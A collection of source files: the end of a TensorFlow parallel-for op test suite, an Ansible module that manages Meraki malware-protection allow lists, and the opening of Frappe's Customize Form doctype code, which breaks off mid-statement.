nn.softplus,
nn.softsign,
]
self._test_unary_cwise_ops(real_ops, False)
def test_unary_cwise_no_grad(self):
for op in [math_ops.ceil, math_ops.floor, math_ops.logical_not]:
x = random_ops.random_uniform([3, 5])
if op == math_ops.logical_not:
x = x > 0
# pylint: disable=cell-var-from-loop
def loop_fn(i):
return op(array_ops.gather(x, i))
# pylint: enable=cell-var-from-loop
self._test_loop_fn(loop_fn, 3)
def test_binary_cwise_ops(self):
# Enable tensor equality to test `equal` and `not_equal` ops below.
default_equality = framework_ops.Tensor._USE_EQUALITY
framework_ops.enable_tensor_equality()
try:
logical_ops = [
math_ops.logical_and, math_ops.logical_or, math_ops.logical_xor
]
# Wrapper functions restricting the range of inputs of zeta and polygamma.
def safe_polygamma(x, y):
return math_ops.polygamma(
math_ops.round(clip_ops.clip_by_value(y, 1, 10)), x * x + 1)
def safe_zeta(x, y):
return math_ops.zeta(x * x + 1, y * y)
float_ops = [
math_ops.add,
math_ops.add_v2,
math_ops.atan2,
math_ops.complex,
math_ops.div,
math_ops.divide,
math_ops.div_no_nan,
math_ops.equal,
lambda x, y: framework_ops.convert_to_tensor(x == y),
lambda x, y: framework_ops.convert_to_tensor(x != y),
math_ops.floor_mod,
math_ops.greater,
math_ops.greater_equal,
math_ops.igamma,
math_ops.igammac,
math_ops.igamma_grad_a,
math_ops.less,
math_ops.less_equal,
math_ops.maximum,
math_ops.minimum,
math_ops.mod,
math_ops.multiply,
math_ops.not_equal,
math_ops.pow,
math_ops.squared_difference,
math_ops.subtract,
math_ops.truncate_mod,
safe_polygamma,
]
# FloorDiv fails on XLA due to floor's discontinuities exacerbating small
# division differences.
if not test_util.is_xla_enabled():
float_ops += [math_ops.floor_div]
# TODO(b/168912036): Re-enable once GPU + XLA issues for Zeta are
# resolved.
if not test_util.is_gpu_available():
float_ops += [safe_zeta]
for op in logical_ops + float_ops:
x = random_ops.random_uniform([7, 3, 5])
y = random_ops.random_uniform([3, 5])
if op in logical_ops:
x = x > 0
y = y > 0
output_dtypes = []
# pylint: disable=cell-var-from-loop
def loop_fn(i):
x1 = array_ops.gather(x, i)
y1 = array_ops.gather(y, i)
outputs = [op(x, y), op(x1, y), op(x, y1), op(x1, y1), op(x1, x1)]
del output_dtypes[:]
output_dtypes.extend(t.dtype for t in outputs)
return outputs
# pylint: enable=cell-var-from-loop
self._test_loop_fn(loop_fn, 3)
finally:
if not default_equality:
framework_ops.disable_tensor_equality()
def test_approximate_equal(self):
x = random_ops.random_uniform([3, 5])
y = random_ops.random_uniform([3, 5])
def loop_fn(i):
x1 = array_ops.gather(x, i)
y1 = array_ops.gather(y, i)
return math_ops.approximate_equal(x1, y1)
self._test_loop_fn(loop_fn, 3)
def test_addn(self):
x = random_ops.random_uniform([2, 3, 5])
y = random_ops.random_uniform([3, 5])
z = random_ops.random_uniform([3, 5])
def loop_fn(i):
x1 = array_ops.gather(x, i)
return math_ops.add_n([x1, y, z])
self._test_loop_fn(loop_fn, 2)
def test_cross(self):
x = random_ops.random_uniform([4, 2, 3])
y = random_ops.random_uniform([4, 2, 3])
def loop_fn(i):
x_i = array_ops.gather(x, i)
y_i = array_ops.gather(y, i)
x_0 = array_ops.gather(x, 0)
return math_ops.cross(x_i, y_i), math_ops.cross(x_0, y_i)
self._test_loop_fn(loop_fn, 4)
@test_util.run_without_tensor_float_32(
"Calls matmul in parallel for-loop and compares result to calling matmul "
"in sequential for-loop")
def test_matmul(self):
for tr_a in (True, False):
for tr_b in (True, False):
for stack_a in (True, False):
for stack_b in (True, False):
shape_a = (5, 3) if tr_a else (3, 5)
if stack_a:
shape_a = (2,) + shape_a
shape_b = (7, 5) if tr_b else (5, 7)
if stack_b:
shape_b = (2,) + shape_b
x = random_ops.random_uniform(shape_a)
y = random_ops.random_uniform(shape_b)
# pylint: disable=cell-var-from-loop
def loop_fn(i):
a = array_ops.gather(x, i) if stack_a else x
b = array_ops.gather(y, i) if stack_b else y
return math_ops.matmul(a, b, transpose_a=tr_a, transpose_b=tr_b)
# pylint: enable=cell-var-from-loop
self._test_loop_fn(loop_fn, 2)
def test_batch_matmul(self):
for tr_a in (True, False):
for tr_b in (True, False):
for stack_a in (True, False):
for stack_b in (True, False):
shape_a = (4, 5, 3) if tr_a else (4, 3, 5)
if stack_a:
shape_a = (2,) + shape_a
shape_b = (4, 7, 5) if tr_b else (4, 5, 7)
if stack_b:
shape_b = (2,) + shape_b
x = random_ops.random_uniform(shape_a)
y = random_ops.random_uniform(shape_b)
# pylint: disable=cell-var-from-loop
def loop_fn(i):
a = array_ops.gather(x, i) if stack_a else x
b = array_ops.gather(y, i) if stack_b else y
return math_ops.matmul(a, b, transpose_a=tr_a, transpose_b=tr_b)
# pylint: enable=cell-var-from-loop
self._test_loop_fn(loop_fn, 2)
def test_batch_matmul_broadcast(self):
for broadcast_a in (True, False):
for broadcast_b in (True, False):
for stack_a in (True, False):
for stack_b in (True, False):
shape_a = (2, 3, 5) if broadcast_a else (4, 2, 3, 5)
shape_b = (2, 5, 7) if broadcast_b else (4, 2, 5, 7)
shape_a = (2,) + shape_a if stack_a else shape_a
shape_b = (2,) + shape_b if stack_b else shape_b
x = random_ops.random_uniform(shape_a)
y = random_ops.random_uniform(shape_b)
# pylint: disable=cell-var-from-loop
def loop_fn(i):
a = array_ops.gather(x, i) if stack_a else x
b = array_ops.gather(y, i) if stack_b else y
return math_ops.matmul(a, b)
# pylint: enable=cell-var-from-loop
self._test_loop_fn(loop_fn, 2)
def test_reduction(self):
x = random_ops.random_uniform([2, 3, 4, 5])
for op in [
math_ops.reduce_sum,
math_ops.reduce_prod,
math_ops.reduce_max,
math_ops.reduce_min,
math_ops.reduce_mean,
]:
for axis in ([1], None, [0, 2], constant_op.constant([1], dtypes.int64)):
for keepdims in (True, False):
# pylint: disable=cell-var-from-loop
def loop_fn(i):
a = array_ops.gather(x, i)
return op(a, axis=axis, keepdims=keepdims)
# pylint: enable=cell-var-from-loop
self._test_loop_fn(loop_fn, 2)
def test_boolean_reduction(self):
x = random_ops.random_uniform([2, 3, 4, 5]) > 0.5
for op in [math_ops.reduce_any, math_ops.reduce_all]:
for axis in ([1], None, [0, 2], constant_op.constant([1], dtypes.int64)):
for keepdims in (True, False):
# pylint: disable=cell-var-from-loop
def loop_fn(i):
a = array_ops.gather(x, i)
return op(a, axis=axis, keepdims=keepdims)
# pylint: enable=cell-var-from-loop
self._test_loop_fn(loop_fn, 2)
def test_argmin_argmax(self):
x = random_ops.random_uniform([2, 3, 4, 5])
for op in [math_ops.argmin, math_ops.argmax]:
for axis in (1, None, -1):
for output_dtype in (dtypes.int32, dtypes.int64, None):
# pylint: disable=cell-var-from-loop
def loop_fn(i):
a = array_ops.gather(x, i)
return op(a, axis=axis, output_type=output_dtype)
# pylint: enable=cell-var-from-loop
self._test_loop_fn(loop_fn, 2)
def test_bucketize(self):
x = random_ops.random_uniform([2, 3, 4])
def loop_fn(i):
a = array_ops.gather(x, i)
return math_ops.bucketize(a, [-1, 0.5, 1])
self._test_loop_fn(loop_fn, 2)
def test_clip_by_value(self):
x = random_ops.random_uniform([2, 3, 4])
def loop_fn(i):
a = array_ops.gather(x, i)
return clip_ops.clip_by_value(a, 0.5, 1.0)
self._test_loop_fn(loop_fn, 2)
def test_cum_sum(self):
x = random_ops.random_uniform([2, 3, 4, 5])
for axis in (1, -2, constant_op.constant(1, dtypes.int64)):
for exclusive in (True, False):
for reverse in (True, False):
# pylint: disable=cell-var-from-loop
def loop_fn(i):
a = array_ops.gather(x, i)
return math_ops.cumsum(
a, axis=axis, exclusive=exclusive, reverse=reverse)
# pylint: enable=cell-var-from-loop
self._test_loop_fn(loop_fn, 2)
def test_cum_prod(self):
x = random_ops.random_uniform([2, 3, 4, 5])
for axis in (1, -2, constant_op.constant(1, dtypes.int64)):
for exclusive in (True, False):
for reverse in (True, False):
# pylint: disable=cell-var-from-loop
def loop_fn(i):
a = array_ops.gather(x, i)
return math_ops.cumprod(
a, axis=axis, exclusive=exclusive, reverse=reverse)
# pylint: enable=cell-var-from-loop
self._test_loop_fn(loop_fn, 2)
def test_bias_add(self):
for data_format in ("NCHW", "NHWC"):
for stacked_value in (True, False):
x_shape = [3, 4, 5, 6]
if stacked_value:
x_shape = [2] + x_shape
x = random_ops.random_uniform(x_shape)
for stacked_bias in (True, False):
if not (stacked_value or stacked_bias):
continue
with backprop.GradientTape(persistent=True) as g:
bias_dim = -1
if data_format == "NCHW":
bias_dim = 2 if stacked_value else 1
bias_shape = [x_shape[bias_dim]]
if stacked_bias:
bias_shape = [2] + bias_shape
bias = random_ops.random_uniform(bias_shape)
g.watch(bias)
# pylint: disable=cell-var-from-loop
def loop_fn(i):
with g:
a = array_ops.gather(x, i) if stacked_value else x
b = array_ops.gather(bias, i) if stacked_bias else bias
y = nn.bias_add(a, b, data_format=data_format)
loss = math_ops.reduce_sum(y * y)
grad = g.gradient(loss, bias)
if stacked_bias:
# If we gather over bias in loop_fn, the gradient will be an
# instance of `IndexedSlices` with attrs `values` and `indices`.
return y, grad.values, grad.indices
else:
return y, grad
# pylint: enable=cell-var-from-loop
out_dtypes = [dtypes.float32, dtypes.float32]
if stacked_bias:
out_dtypes = out_dtypes + [dtypes.int32]
self._test_loop_fn(loop_fn, 2)
@parameterized.parameters(
(math_ops.unsorted_segment_sum,), (math_ops.unsorted_segment_min,),
(math_ops.unsorted_segment_max,), (math_ops.unsorted_segment_prod,))
def test_unsorted_segment_reduction(self, reduction_op):
t = random_ops.random_uniform([3, 3, 2])
for segment_ids_dtype in (dtypes.int32, dtypes.int64):
for num_segments_dtype in (dtypes.int32, dtypes.int64):
segment_ids = constant_op.constant([[0, 0, 2], [0, 1, 2], [2, 2, 2]],
dtype=segment_ids_dtype)
num_segments = constant_op.constant(3, dtype=num_segments_dtype)
# pylint: disable=cell-var-from-loop
def loop_fn(i):
data = array_ops.gather(t, i)
data_0 = array_ops.gather(t, 0)
seg_ids = array_ops.gather(segment_ids, i)
seg_ids_0 = array_ops.gather(segment_ids, 0)
return (reduction_op(data, seg_ids, num_segments),
reduction_op(data_0, seg_ids, num_segments),
reduction_op(data, seg_ids_0, num_segments))
# pylint: enable=cell-var-from-loop
self._test_loop_fn(loop_fn, 3)
@parameterized.parameters((math_ops.sparse_segment_sum_v2, True),
(math_ops.sparse_segment_mean_v2, True),
(math_ops.sparse_segment_sqrt_n_v2, True),
(math_ops.sparse_segment_sum_v2, False),
(math_ops.sparse_segment_mean_v2, False),
(math_ops.sparse_segment_sqrt_n_v2, False))
def test_sparse_segment(self, op_func, with_num_segments):
data = random_ops.random_uniform([3, 4, 2])
indices = constant_op.constant([[1, 2, 3], [0, 1, 2], [0, 2, 3]])
seg_ids = constant_op.constant([[0, 0, 2], [1, 1, 1], [0, 1, 1]])
if with_num_segments:
num_segments = 3
else:
num_segments = None
def loop_fn(i):
data_i = array_ops.gather(data, i)
data_0 = array_ops.gather(data, 0)
indices_i = array_ops.gather(indices, i)
indices_0 = array_ops.gather(indices, 0)
seg_ids_i = array_ops.gather(seg_ids, i)
seg_ids_0 = array_ops.gather(seg_ids, 0)
outputs = [
op_func(data_0, indices_i, seg_ids_0, num_segments=num_segments),
op_func(data_i, indices_i, seg_ids_0, num_segments=num_segments),
op_func(data_0, indices_0, seg_ids_0, num_segments=num_segments),
op_func(data_i, indices_0, seg_ids_0, num_segments=num_segments)
]
if with_num_segments:
# For this case, we support loop variant segment_ids as well.
outputs += [
op_func(data_0, indices_i, seg_ids_i, num_segments=num_segments),
op_func(data_i, indices_i, seg_ids_i, num_segments=num_segments),
op_func(data_0, indices_0, seg_ids_i, num_segments=num_segments),
op_func(data_i, indices_0, seg_ids_i, num_segments=num_segments)
]
return outputs
self._test_loop_fn(loop_fn, 3)
@parameterized.parameters(math_ops.sparse_segment_mean_grad,
math_ops.sparse_segment_sqrt_n_grad)
def test_sparse_segment_grad(self, op_func):
grad = random_ops.random_uniform([3, 3, 2])
indices = constant_op.constant([1, 2, 3])
seg_ids = constant_op.constant([0, 0, 2])
dim0 = 4
def loop_fn(i):
grad_i = array_ops.gather(grad, i)
return op_func(grad_i, indices, seg_ids, dim0)
self._test_loop_fn(loop_fn, 3)
def test_cast(self):
x = constant_op.constant([[1], [2]])
y = constant_op.constant([[1.0], [2.0]])
def loop_fn(i):
return (math_ops.cast(array_ops.gather(x, i), dtypes.float32),
math_ops.cast(array_ops.gather(y, i), dtypes.int32))
self._test_loop_fn(loop_fn, 2)
def test_tanh_axpy(self):
a = constant_op.constant(3.)
x = random_ops.random_uniform([4, 5])
y = random_ops.random_uniform([6, 5])
n = x.shape[0]
def loop_fn(i):
return math_ops.tanh(a * array_ops.gather(x, i) + array_ops.gather(y, i))
self._test_loop_fn(loop_fn, n)
def test_select(self):
a = random_ops.random_uniform([2, 3, 5])
b = random_ops.random_uniform([2, 3, 5])
for cond_shape in [2], [2, 3], [2, 3, 5]:
cond = random_ops.random_uniform(cond_shape) > 0.5
# pylint: disable=cell-var-from-loop
def loop_fn(i):
a_i = array_ops.gather(a, i)
b_i = array_ops.gather(b, i)
cond_i = array_ops.gather(cond, i)
return array_ops.where(cond_i, a_i, b_i)
# pylint: enable=cell-var-from-loop
self._test_loop_fn(loop_fn, 2)
def test_selectv2_cond_needs_broadcast(self):
a = random_ops.random_uniform([2, 3, 5])
b = random_ops.random_uniform([2, 3, 5])
# wherev2 assumes all shapes are broadcastable with each other.
# This means that we can only specify conditions that are
# broadcastable with [3, 5].
for cond_shape in [2], [2, 1], [2, 5], [2, 3, 1], [2, 3, 5]:
cond = random_ops.random_uniform(cond_shape) > 0.5
# pylint: disable=cell-var-from-loop
def loop_fn(i):
a_i = array_ops.gather(a, i)
b_i = array_ops.gather(b, i)
cond_i = array_ops.gather(cond, i)
return array_ops.where_v2(cond_i, a_i, b_i)
# pylint: enable=cell-var-from-loop
self._test_loop_fn(loop_fn, 2)
def test_selectv2_args_need_broadcast(self):
a = random_ops.random_uniform([2, 5])
b = random_ops.random_uniform([2, 3, 5])
# wherev2 assumes all shapes are broadcastable with each other.
# This means that we can only specify conditions that are
# broadcastable with [3, 5].
for cond_shape in [2], [2, 1], [2, 5], [2, 3, 1], [2, 3, 5]:
cond = random_ops.random_uniform(cond_shape) > 0.5
# pylint: disable=cell-var-from-loop
def loop_fn(i):
a_i = array_ops.gather(a, i)
b_i = array_ops.gather(b, i)
cond_i = array_ops.gather(cond, i)
return array_ops.where_v2(cond_i, a_i, b_i)
# pylint: enable=cell-var-from-loop
self._test_loop_fn(loop_fn, 2)
def test_selectv2_cond_fixed(self):
cond = random_ops.random_uniform([3, 5]) > 0.5
b = random_ops.random_uniform([2, 3, 5])
# wherev2 assumes all shapes are broadcastable with each other.
# This means that we can only specify conditions that are
# broadcastable with [3, 5].
for a_shape in [2], [2, 1], [2, 5], [2, 3, 1], [2, 3, 5]:
a = random_ops.random_uniform(a_shape)
# pylint: disable=cell-var-from-loop
def loop_fn(i):
a_i = array_ops.gather(a, i)
b_i = array_ops.gather(b, i)
return array_ops.where_v2(cond, a_i, b_i)
# pylint: enable=cell-var-from-loop
self._test_loop_fn(loop_fn, 2)
@test_util.run_all_in_graph_and_eager_modes
class LinalgTest(PForTestCase):
def test_cholesky(self):
z = random_ops.random_normal([2, 3, 3])
x = (
math_ops.matmul(z, array_ops.matrix_transpose(z)) # Ensure pos. def.
+ linalg_ops.eye(3)) # Ensure well-conditioned.
def loop_fn(i):
return linalg_ops.cholesky(array_ops.gather(x, i))
self._test_loop_fn(loop_fn, 2)
def test_log_matrix_determinant(self):
for x_shape in ([3, 4, 2, 2], [3, 2, 2]):
x = random_ops.random_normal(x_shape)
# pylint: disable=cell-var-from-loop
def loop_fn(i):
return linalg_ops.log_matrix_determinant(array_ops.gather(x, i))
# pylint: enable=cell-var-from-loop
self._test_loop_fn(loop_fn, 3)
def test_matrix_inverse(self):
x = (random_ops.random_uniform([3, 4, 2, 2]) +
10 * linalg_ops.eye(2)) # Ensure well-conditioned.
for adjoint in (True, False):
# pylint: disable=cell-var-from-loop
def loop_fn(i):
return linalg_ops.matrix_inverse(array_ops.gather(x, i),
adjoint=adjoint)
# pylint: enable=cell-var-from-loop
self._test_loop_fn(loop_fn, 2)
def test_matrix_solve(self):
for adjoint in (True, False):
for stack_a in (True, False):
for stack_b in (True, False):
shape_a = (2, 4, 3, 3) if stack_a else (4, 3, 3)
shape_b = (2, 4, 3, 5) if stack_b else (4, 3, 5)
x = (random_ops.random_uniform(shape_a) +
10 * linalg_ops.eye(3)) # Ensure well-conditioned.
y = random_ops.random_uniform(shape_b)
# pylint: disable=cell-var-from-loop
def loop_fn(i):
a = array_ops.gather(x, i) if stack_a else x
b = array_ops.gather(y, i) if stack_b else y
return linalg_ops.matrix_solve(a, b, adjoint=adjoint)
# pylint: enable=cell-var-from-loop
self._test_loop_fn(loop_fn, 2)
def test_matrix_triangular_solve(self):
for lower in (True, False):
for adjoint in (True, False):
for stack_a in (True, False):
for stack_b in (True, False):
shape_a = (2, 4, 3, 3) if stack_a else (4, 3, 3)
shape_b = (2, 4, 3, 5) if stack_b else (4, 3, 5)
x = array_ops.matrix_band_part(
random_ops.random_uniform(shape_a) +
linalg_ops.eye(3), # Ensure well-conditioned.
*((-1, 0) if lower else (0, -1))) # Ensure triangular.
y = random_ops.random_uniform(shape_b)
# pylint: disable=cell-var-from-loop
def loop_fn(i):
a = array_ops.gather(x, i) if stack_a else x
b = array_ops.gather(y, i) if stack_b else y
return linalg_ops.matrix_triangular_solve(
a, b, lower=lower, adjoint=adjoint)
# pylint: enable=cell-var-from-loop
self._test_loop_fn(loop_fn, 2)
def test_self_adjoint_eig(self):
z = random_ops.random_normal([2, 3, 3])
x = z + array_ops.matrix_transpose(z) # Ensure self-adjoint.
def loop_fn(i):
return (linalg_ops.self_adjoint_eig(array_ops.gather(x, i)),
linalg_ops.self_adjoint_eigvals(array_ops.gather(x, i)))
self._test_loop_fn(loop_fn, 2)
@test_util.run_without_tensor_float_32(
"Calls einsum in parallel for-loop and compares result to calling einsum "
"in sequential for-loop")
def test_einsum(self):
b = 10
x_series = random_ops.random_uniform([b, 9, 9])
y_series = random_ops.random_uniform([b, 9, 1])
def loop_fn(i):
x = array_ops.gather(x_series, 0) # invariant.
y = array_ops.gather(y_series, 0) # invariant.
x_i = array_ops.gather(x_series, i)
y_i = array_ops.gather(y_series, i)
z1 = special_math_ops.einsum("ab,bc->ac", x_i, y)
z2 = special_math_ops.einsum("ab,bc->ac", x, y_i)
z3 = special_math_ops.einsum("ab,bc->ac", x, y)
z4 = special_math_ops.einsum("ab,bc->ac", x_i, y_i)
z5 = special_math_ops.einsum("cd,ce->de", y_i, x_i) # Includes transpose.
outputs = [z1, z2, z3, z4, z5]
return outputs
self._test_loop_fn(loop_fn, b)
if __name__ == "__main__":
test.main()
|
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2019, Kevin Breit (@kbreit) <[email protected]>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {
'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'
}
DOCUMENTATION = r'''
---
module: meraki_malware
short_description: Manage Malware Protection in the Meraki cloud
version_added: "2.9"
description:
- Fully configure malware protection in a Meraki environment.
notes:
- Some of the options are likely only used for developers within Meraki.
options:
state:
description:
- Specifies whether object should be queried, created/modified, or removed.
choices: [absent, present, query]
default: query
type: str
net_name:
description:
- Name of network which configuration is applied to.
aliases: [network]
type: str
net_id:
description:
- ID of network which configuration is applied to.
type: str
allowed_urls:
description:
- List of URLs to whitelist.
type: list
elements: dict
suboptions:
url:
description:
- URL string to allow.
type: str
comment:
description:
- Human readable information about URL.
type: str
allowed_files:
description:
- List of files to whitelist.
type: list
elements: dict
suboptions:
sha256:
description:
- 256-bit hash of file.
type: str
aliases: [ hash ]
comment:
description:
- Human readable information about file.
type: str
mode:
description:
- Enabled or disabled state of malware protection.
choices: [disabled, enabled]
type: str
author:
- Kevin Breit (@kbreit)
extends_documentation_fragment: meraki
'''
EXAMPLES = r'''
- name: Enable malware protection
meraki_malware:
auth_key: abc123
state: present
org_name: YourOrg
net_name: YourNet
mode: enabled
delegate_to: localhost
- name: Set whitelisted url
meraki_malware:
auth_key: abc123
state: present
org_name: YourOrg
net_name: YourNet
mode: enabled
allowed_urls:
- url: www.google.com
comment: Google
delegate_to: localhost
- name: Set whitelisted file
meraki_malware:
auth_key: abc123
state: present
org_name: YourOrg
net_name: YourNet
mode: enabled
allowed_files:
- sha256: e82c5f7d75004727e1f3b94426b9a11c8bc4c312a9170ac9a73abace40aef503
comment: random zip
delegate_to: localhost
- name: Get malware settings
meraki_malware:
auth_key: abc123
state: query
org_name: YourOrg
net_name: YourNet
delegate_to: localhost
'''
RETURN = r'''
data:
description: Information about the malware protection settings.
returned: success
type: complex
contains:
mode:
description: Mode to enable or disable malware scanning.
returned: success
type: str
sample: enabled
allowed_files:
description: List of files which are whitelisted.
returned: success
type: complex
contains:
sha256:
description: sha256 hash of whitelisted file.
returned: success
type: str
sample: e82c5f7d75004727e1f3b94426b9a11c8bc4c312a9170ac9a73abace40aef503
comment:
description: Comment about the whitelisted entity
returned: success
type: str
sample: TPS report
allowed_urls:
description: List of URLs which are whitelisted.
returned: success
type: complex
contains:
url:
description: URL of whitelisted site.
returned: success
type: str
sample: site.com
comment:
description: Comment about the whitelisted entity
returned: success
type: str
sample: Corporate HQ
'''
import os
from ansible.module_utils.basic import AnsibleModule, json, env_fallback
from ansible.module_utils._text import to_native
from ansible.module_utils.common.dict_transformations import recursive_diff
from ansible.module_utils.network.meraki.meraki import MerakiModule, meraki_argument_spec
def main():
# define the available arguments/parameters that a user can pass to
# the module
urls_arg_spec = dict(url=dict(type='str'),
comment=dict(type='str'),
)
files_arg_spec = dict(sha256=dict(type='str', aliases=['hash']),
comment=dict(type='str'),
)
argument_spec = meraki_argument_spec()
argument_spec.update(state=dict(type='str', choices=['absent', 'present', 'query'], default='query'),
net_name=dict(type='str', aliases=['network']),
net_id=dict(type='str'),
mode=dict(type='str', choices=['enabled', 'disabled']),
allowed_urls=dict(type='list', default=None, elements='dict', options=urls_arg_spec),
allowed_files=dict(type='list', default=None, elements='dict', options=files_arg_spec),
)
# seed the result dict in the object
# we primarily care about changed and state
# change is if this module effectively modified the target
# state will include any data that you want your module to pass back
# for consumption, for example, in a subsequent task
result = dict(
changed=False,
)
# the AnsibleModule object will be our abstraction working with Ansible
# this includes instantiation, a couple of common attr would be the
# args/params passed to the execution, as well as if the module
# supports check mode
module = AnsibleModule(argument_spec=argument_spec,
supports_check_mode=True,
)
meraki = MerakiModule(module, function='malware')
meraki.params['follow_redirects'] = 'all'
query_url = {'malware': '/networks/{net_id}/security/malwareSettings'}
update_url = {'malware': '/networks/{net_id}/security/malwareSettings'}
meraki.url_catalog['get_one'].update(query_url)
meraki.url_catalog['update'] = update_url
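# Illustrative note (hypothetical id, based on the templates above): given
# net_id 'N_1234', construct_path('get_one', net_id=net_id) is expected to
# resolve to '/networks/N_1234/security/malwareSettings'.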
org_id = meraki.params['org_id']
if org_id is None:
org_id = meraki.get_org_id(meraki.params['org_name'])
net_id = meraki.params['net_id']
if net_id is None:
nets = meraki.get_nets(org_id=org_id)
net_id = meraki.get_net_id(net_name=meraki.params['net_name'], data=nets)
# Check for argument completeness
if meraki.params['state'] == 'present':
if meraki.params['allowed_files'] is not None or meraki.params['allowed_urls'] is not None:
if meraki.params['mode'] is None:
meraki.fail_json(msg="mode must be set when allowed_files or allowed_urls is set.")
# Assemble payload
if meraki.params['state'] == 'present':
payload = dict()
if meraki.params['mode'] is not None:
payload['mode'] = meraki.params['mode']
if meraki.params['allowed_urls'] is not None:
payload['allowedUrls'] = meraki.params['allowed_urls']
if meraki.params['allowed_files'] is not None:
payload['allowedFiles'] = meraki.params['allowed_files']
if meraki.params['state'] == 'query':
path = meraki.construct_path('get_one', net_id=net_id)
data = meraki.request(path, method='GET')
if meraki.status == 200:
meraki.result['data'] = data
elif meraki.params['state'] == 'present':
path = meraki.construct_path('get_one', net_id=net_id)
original = meraki.request(path, method='GET')
if meraki.is_update_required(original, payload):
if meraki.module.check_mode is True:
diff = recursive_diff(original, payload)
original.update(payload)
meraki.result['diff'] = {'before': diff[0],
'after': diff[1],
}
meraki.result['data'] = original
meraki.result['changed'] = True
meraki.exit_json(**meraki.result)
path = meraki.construct_path('update', net_id=net_id)
data = meraki.request(path, method='PUT', payload=json.dumps(payload))
if meraki.status == 200:
diff = recursive_diff(original, payload)
meraki.result['diff'] = {'before': diff[0],
'after': diff[1],
}
meraki.result['data'] = data
meraki.result['changed'] = True
else:
meraki.result['data'] = original
# in the event of a successful module execution, you will want to
# simply call AnsibleModule.exit_json(), passing the key/value results
meraki.exit_json(**meraki.result)
if __name__ == '__main__':
main()
|
|
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
"""
Customize Form is a Single DocType used to mask the Property Setter
Thus providing a better UI from user perspective
"""
import frappe
import frappe.translate
from frappe import _
from frappe.utils import cint
from frappe.model.document import Document
from frappe.model import no_value_fields
from frappe.core.doctype.doctype.doctype import validate_fields_for_doctype
doctype_properties = {
'search_fields': 'Data',
'title_field': 'Data',
'image_field': 'Data',
'sort_field': 'Data',
'sort_order': 'Data',
'default_print_format': 'Data',
'read_only_onload': 'Check',
'allow_copy': 'Check',
'istable': 'Check',
'quick_entry': 'Check',
'editable_grid': 'Check',
'max_attachments': 'Int',
'image_view': 'Check',
'track_changes': 'Check',
}
docfield_properties = {
'idx': 'Int',
'label': 'Data',
'fieldtype': 'Select',
'options': 'Text',
'permlevel': 'Int',
'width': 'Data',
'print_width': 'Data',
'reqd': 'Check',
'unique': 'Check',
'ignore_user_permissions': 'Check',
'in_list_view': 'Check',
'in_standard_filter': 'Check',
'in_global_search': 'Check',
'bold': 'Check',
'hidden': 'Check',
'collapsible': 'Check',
'collapsible_depends_on': 'Data',
'print_hide': 'Check',
'print_hide_if_no_value': 'Check',
'report_hide': 'Check',
'allow_on_submit': 'Check',
'depends_on': 'Data',
'description': 'Text',
'default': 'Text',
'precision': 'Select',
'read_only': 'Check',
'length': 'Int',
'columns': 'Int',
'remember_last_selected_value': 'Check',
'allow_bulk_edit': 'Check',
}
allowed_fieldtype_change = (('Currency', 'Float', 'Percent'), ('Small Text', 'Data'),
('Text', 'Data'), ('Text', 'Text Editor', 'Code', 'Signature'), ('Data', 'Select'),
('Text', 'Small Text'))
allowed_fieldtype_for_options_change = ('Read Only', 'HTML', 'Select',)
class CustomizeForm(Document):
def on_update(self):
frappe.db.sql("delete from tabSingles where doctype='Customize Form'")
frappe.db.sql("delete from `tabCustomize Form Field`")
def fetch_to_customize(self):
self.clear_existing_doc()
if not self.doc_type:
return
meta = frappe.get_meta(self.doc_type)
# doctype properties
for property in doctype_properties:
self.set(property, meta.get(property))
for d in meta.get("fields"):
new_d = {"fieldname": d.fieldname, "is_custom_field": d.get("is_custom_field"), "name": d.name}
for property in docfield_properties:
new_d[property] = d.get(property)
self.append("fields", new_d)
# load custom translation
translation = self.get_name_translation()
self.label = translation.target_name if translation else ''
# NOTE doc is sent to clientside by run_method
def get_name_translation(self):
'''Get translation object if exists of current doctype name in the default language'''
return frappe.get_value('Translation',
{'source_name': self.doc_type, 'language': frappe.local.lang or 'en'},
['name', 'target_name'], as_dict=True)
def set_name_translation(self):
'''Create, update custom translation for this doctype'''
current = self.get_name_translation()
if current:
if not self.label:
# label cleared, remove the existing translation
frappe.delete_doc('Translation', current.name)
elif current.target_name != self.label:
# label changed, update the existing translation
frappe.db.set_value('Translation', current.name, 'target_name', self.label)
frappe.translate.clear_cache()
else:
if self.label:
frappe.get_doc(dict(doctype='Translation',
source_name=self.doc_type,
target_name=self.label,
language_code=frappe.local.lang or 'en')).insert()
def clear_existing_doc(self):
doc_type = self.doc_type
for fieldname in self.meta.get_valid_columns():
self.set(fieldname, None)
for df in self.meta.get_table_fields():
self.set(df.fieldname, [])
self.doc_type = doc_type
self.name = "Customize Form"
def save_customization(self):
if not self.doc_type:
return
self.flags.update_db = False
self.set_property_setters()
self.update_custom_fields()
self.set_name_translation()
validate_fields_for_doctype(self.doc_type)
if self.flags.update_db:
from frappe.model.db_schema import updatedb
updatedb(self.doc_type)
if not hasattr(self, 'hide_success') or not self.hide_success:
frappe.msgprint(_("{0} updated").format(_(self.doc_type)))
frappe.clear_cache(doctype=self.doc_type)
self.fetch_to_customize()
def set_property_setters(self):
meta = frappe.get_meta(self.doc_type)
# doctype property setters
for property in doctype_properties:
if self.get(property) != meta.get(property):
self.make_property_setter(property=property, value=self.get(property),
property_type=doctype_properties[property])
for df in self.get("fields"):
if df.get("__islocal"):
continue
meta_df = meta.get("fields", {"fieldname": df.fieldname})
if not meta_df or meta_df[0].get("is_custom_field"):
continue
for property in docfield_properties:
if property != "idx" and df.get(property) != meta_df[0].get(property):
if property == "fieldtype":
self.validate_fieldtype_change(df, meta_df[0].get(property), df.get(property))
elif property == "allow_on_submit" and df.get(property):
frappe.msgprint(_("Row {0}: Not allowed to enable Allow on Submit for standard fields")\
.format(df.idx))
continue
elif property == "in_list_view" and df.get(property) \
and df.fieldtype!="Attach Image" and df.fieldtype in no_value_fields:
frappe.msgprint(_("'In List View' not allowed for type {0} in row {1}")
.format(df.fieldtype, df.idx))
continue
elif property == "precision" and cint(df.get("precision")) > 6 \
and cint(df.get("precision")) > cint(meta_df[0].get("precision")):
self.flags.update_db = True
elif property == "unique":
self.flags.update_db = True
elif (property == "read_only" and cint(df.get("read_only"))==0
